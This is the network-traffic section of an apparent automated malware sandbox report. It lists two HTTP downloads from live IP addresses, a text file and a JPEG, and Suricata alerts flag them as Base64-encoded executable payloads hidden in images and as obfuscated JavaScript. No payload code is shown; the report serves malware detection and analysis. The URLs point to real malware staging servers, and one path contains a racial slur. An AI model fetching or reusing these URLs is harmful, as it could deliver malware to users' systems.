Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
GET
200
http://91.92.254.14/Users_API/negrocock/file_in0kfcuh.ojw.txt
REQUEST
RESPONSE
BODY
GET /Users_API/negrocock/file_in0kfcuh.ojw.txt HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: ko
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: 91.92.254.14
HTTP/1.1 200 OK
Date: Thu, 04 Jul 2024 01:39:19 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Wed, 03 Jul 2024 19:32:08 GMT
ETag: "584-61c5ce2d0b714"
Accept-Ranges: bytes
Content-Length: 1412
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
GET
200
http://91.92.254.194/imge/new-image_v.jpg
REQUEST
RESPONSE
BODY
GET /imge/new-image_v.jpg HTTP/1.1
Host: 91.92.254.194
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 04 Jul 2024 01:39:21 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Wed, 03 Jul 2024 13:17:15 GMT
ETag: "67fd9-61c57a629b9c6"
Accept-Ranges: bytes
Content-Length: 425945
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/jpeg
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 91.92.254.194:80 -> 192.168.56.101:49164 | 2400012 | ET DROP Spamhaus DROP Listed Traffic Inbound group 13 | Misc Attack |
TCP 91.92.254.14:80 -> 192.168.56.101:49161 | 2400012 | ET DROP Spamhaus DROP Listed Traffic Inbound group 13 | Misc Attack |
TCP 91.92.254.14:80 -> 192.168.56.101:49161 | 2049038 | ET MALWARE Malicious Base64 Encoded Payload In Image | A Network Trojan was detected |
TCP 91.92.254.194:80 -> 192.168.56.101:49164 | 2047750 | ET MALWARE Base64 Encoded MZ In Image | A Network Trojan was detected |
TCP 91.92.254.194:80 -> 192.168.56.101:49164 | 2049038 | ET MALWARE Malicious Base64 Encoded Payload In Image | A Network Trojan was detected |
TCP 91.92.254.14:80 -> 192.168.56.101:49161 | 2012325 | ET WEB_CLIENT Obfuscated Javascript // ptth | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts